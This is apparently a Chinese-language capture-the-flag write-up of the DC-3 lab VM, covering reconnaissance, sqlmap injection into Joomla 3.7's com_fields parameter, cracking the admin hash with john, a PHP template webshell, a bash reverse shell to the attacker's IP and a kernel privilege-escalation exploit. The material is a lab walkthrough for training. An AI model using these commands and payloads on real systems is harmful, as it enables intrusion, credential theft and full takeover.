DC-3实战演练

攻击机：kali 192.168.56.102

靶机：ubantu 192.168.56.101

DC-3不能像DC-1,2一样直接放入VM，我们这里需要用到VirtualBox。先将DC-3的ovf导入到VirtualBox

点开设置-网络

网卡设置为仅主机

再打开VM虚拟机-kali-设置双网卡，一个nat，一个自定义（我这里是VMnet2）

编辑-虚拟网络适配器-更改设置

VMnet更改到桥接-桥接至VirtualBox

这样就可以访问到同一网段了

打开kali机

ifconfig查看自己配置的网卡

可以看到是eth1，0是nat的ip

利用arp-scan扫描

arp-scan -I eth1 l

有两个ip如何判断呢，我们可以都进行一波扫描

nmap -sS 192.168.56.100nmap -sS 192.168.56.101

101这个ip开放了80端口，对他进行一个更详细的扫描

访问该IP端口

扫描网站目录

dirsearch  -u  http://192.168.56.101

扫描结果：

/administrator

/robots.txt.dist

/web.config.txt

/README.txt

等容易泄露的路径，一一查看

根据这些信息，我们可以知道cms是Joomla（nmap也扫出），版本是3.7,以及joomla后台登陆地址

当然我们也可以根据nmap扫描结果后直接利用Joomscan扫描，joomscan可以扫出该网站joomla相关信息

这里我们使用kali自带的searchsploit检索joomla相关漏洞

路径在usr/share/exploitdb/exploits/下面

这里也会有利用方式，直接sqlmap

sqlmap -u "http://192.168.56.101/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent --dbs -p list[fullordering]

sqlmap -u "http://192.168.56.101/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent  -p list[fullordering] -D joomladb --tables

sqlmap -u "http://192.168.56.101/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent  -p list[fullordering] -D joomladb -T "#_users" --columns

由于#号特殊，这里表名是需要加双引号的

sqlmap -u "http://192.168.56.101/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent -D joomladb -T  "#__users" --columns -p list[fullordering]

sqlmap -u "http://192.168.56.101/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent -D joomladb -T  "#__users" -C username,password --dump -p list[fullordering]

放入cmd5查看，可以找到但是付费（没钱）。直接利用john工具爆破hash值

这里因为我之前爆出来过所以开始不显示，用john --show即可

joomla后台账号是admin，所以可以直接登录查看

其实提示也很明显，拿到root权限，而且取决于系统（大概率是系统漏洞）,那么面对后台我们首先也需要先拿到web的权限，才能进行root的提权。

后台里寻找文件上传点，或者数据库直接写马（这里不做操作，路径不明且被限制无法上传）

关于文件上传，可以寻找头像sfz等图片上传点，或者文件，模板上传点

可以看到这里是存在上传漏洞的，直接就允许php文件的上传，我们开始上马然后连接

然后发现权限是低权限，先利用工具反弹shell到kali

不知道为啥弹失败了，后面我重新回到模板那里，利用命令

<?phpsystem("bash -c 'bash -i >& /dev/tcp/192.168.56.102/7788 0>&1' ");?>

kali设置好监听 nc -lvvp 7788,然后这边访问该路径下4.php

cat /etc/issue 查看系统版本信息

用searchsploit查找版本漏洞

很多，寻找可利用的,这里很杂乱。可以直接进入官网查看https://www.exploit-db.com/

这里选择用39772.txt

直接下载zip到本地然后上传到蚁剑

unzip 39772.ziplscd 39772  lstar -xvf exploit.tarlscd ebpf_mapfd_doubleput_exploitls./compile.sh./doubleput



利用方法已在文件中指出，解压执行即可
提权成功，输入whoami查看，再进入root目录下查看flag

原文始发于微信公众号（shadowsec）：DC-3实战演练